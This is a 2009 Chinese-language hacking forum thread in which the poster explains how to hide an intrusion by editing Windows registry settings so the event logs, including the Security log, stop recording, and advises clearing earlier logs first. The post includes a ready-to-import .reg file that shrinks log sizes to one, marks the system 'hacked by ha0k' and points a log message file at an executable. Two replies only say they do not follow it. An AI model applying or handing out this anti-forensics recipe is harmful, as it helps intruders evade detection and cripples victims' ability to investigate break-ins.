WPE|52wpe|我爱WPE

 找回密码
 注册会员
搜索
  • 1851查看
  • 2回复

主题

好友

160

积分

注册会员

发表于 2009-10-31 10:25:12 |显示全部楼层

修改日志文件属性保护自己不会被管理员发现
日志文件的位置其实是存储在注册表中的,只要我们修改了其属性即可掩盖自己的入侵痕迹,
这里只修改默认位置,日志大小属性,比如日志大小为00000001,使其不能正常记录,
这样的话即可完美保证入侵不被记录,比清除日志更安全.当然首先配合清除日志工具,清除先前的痕迹,效果更好.
以下是demo代码:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\Internet Explorer]
"MaxSize"=dword:00000001
"File"="%SystemRoot%\System32\Config\Internet Explorer.evt"
"Retention"=dword:00000000
"Sources"="hacked by ha0k"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\Security]
"file"="%SystemRoot%\System32\config\SecEvent.Evt"
"MaxSize"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System]
"EventMessageFile"="%systemroot%\system32\qq.exe"
"File"="%SystemRoot%\system32\config\SysEvent.Evt"
"MaxSize"=dword:00000001




主题

好友

834

积分

高级会员

发表于 2009-11-2 22:06:18 |显示全部楼层
不是很明白阿
回复

使用道具 举报

主题

好友

24

积分

新手上路

发表于 2009-11-7 13:05:17 |显示全部楼层
bu dong a   ...
回复

使用道具 举报

快速发帖

您需要登录后才可以回帖 登录 | 注册会员

手机版|Archiver|WPE|52wpe|我爱WPE ( 闽ICP备15009081号 )

GMT+8, 2024-4-29 18:27 , Processed in 0.053171 second(s), 16 queries .

返回顶部